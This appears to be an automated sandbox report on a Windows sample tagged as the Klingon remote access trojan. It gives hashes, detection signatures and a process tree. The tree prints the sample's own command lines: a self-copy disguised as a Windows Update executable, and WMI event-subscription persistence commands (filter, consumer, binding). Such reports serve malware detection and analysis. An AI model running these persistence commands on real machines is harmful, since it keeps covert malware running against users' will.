Analysis

  • max time kernel
    146s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-06-2021 07:27

General

  • Target

    c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe

  • Size

    3.1MB

  • MD5

    14471a353788bb6cdb6071d0e0a83004

  • SHA1

    c90b5c534ce0d622547bc5b96075eb3d4212d660

  • SHA256

    c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349

  • SHA512

    57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8

Malware Config

Signatures

  • Klingon

    Klingon is a remote access trojan written in Golang with various capabilities.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe
    "C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\system32\cmd.exe
      cmd /C start "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Users\Admin\AppData\Local\Windows Update\updater10.exe
        "C:\Users\Admin\AppData\Local\Windows Update\updater10.exe" \"-0\" \"-0\" \"-C:\Users\Admin\AppData\Local\Temp\c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349.exe\"
        3⤵
        • Executes dropped EXE
        • Deletes itself
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\System32\Wbem\wmic.exe
          wmic process get Caption,ParentProcessId,ProcessId
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe ver
          4⤵
            PID:3684
          • C:\Windows\system32\cmd.exe
            cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2104
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4040
          • C:\Windows\system32\cmd.exe
            cmd /C "wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:636
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic /namespace:'\\root\subscription' PATH CommandLineEventConsumer CREATE Name='GuacBypassConsumer', ExecutablePath='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0', CommandLineTemplate='\"C:\Users\Admin\AppData\Local\Windows Update\updater10.exe\" -0 -0'
              5⤵
                PID:1484
            • C:\Windows\system32\cmd.exe
              cmd /C "wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2268
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic /namespace:'\\root\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='GuacBypassFilter'', Consumer='CommandLineEventConsumer.Name='GuacBypassConsomer'')
                5⤵
                  PID:3784
              • C:\Windows\System32\Wbem\wmic.exe
                wmic process get Caption,ParentProcessId,ProcessId
                4⤵
                  PID:1872
                • C:\Windows\system32\cmd.exe
                  cmd /C "wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1804
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic /namespace:'\\root\subscription' PATH __EventFilter CREATE Name='GuacBypassFilter', EventNameSpace='root\cimv2', QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''
                    5⤵
                      PID:4060

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Windows Update\updater10.exe

              MD5

              14471a353788bb6cdb6071d0e0a83004

              SHA1

              c90b5c534ce0d622547bc5b96075eb3d4212d660

              SHA256

              c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349

              SHA512

              57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8

            • C:\Users\Admin\AppData\Local\Windows Update\updater10.exe

              MD5

              14471a353788bb6cdb6071d0e0a83004

              SHA1

              c90b5c534ce0d622547bc5b96075eb3d4212d660

              SHA256

              c66544e5f49feda32c75e9f796681499bda314866e6ae1e11398be9b4bc89349

              SHA512

              57d2cc72d41fdcd2363b9dd56fedf75b99512c9aa50386c1595ae59aad70b8d19e264fe82224b446f5b1bbe9b470dc349582782ad061be34d47abd42016c37e8

            • memory/636-122-0x0000000000000000-mapping.dmp

            • memory/1484-123-0x0000000000000000-mapping.dmp

            • memory/1484-114-0x0000000000000000-mapping.dmp

            • memory/1804-127-0x0000000000000000-mapping.dmp

            • memory/1872-126-0x0000000000000000-mapping.dmp

            • memory/2104-120-0x0000000000000000-mapping.dmp

            • memory/2268-124-0x0000000000000000-mapping.dmp

            • memory/2340-115-0x0000000000000000-mapping.dmp

            • memory/3684-119-0x0000000000000000-mapping.dmp

            • memory/3784-125-0x0000000000000000-mapping.dmp

            • memory/4040-121-0x0000000000000000-mapping.dmp

            • memory/4060-118-0x0000000000000000-mapping.dmp

            • memory/4060-128-0x0000000000000000-mapping.dmp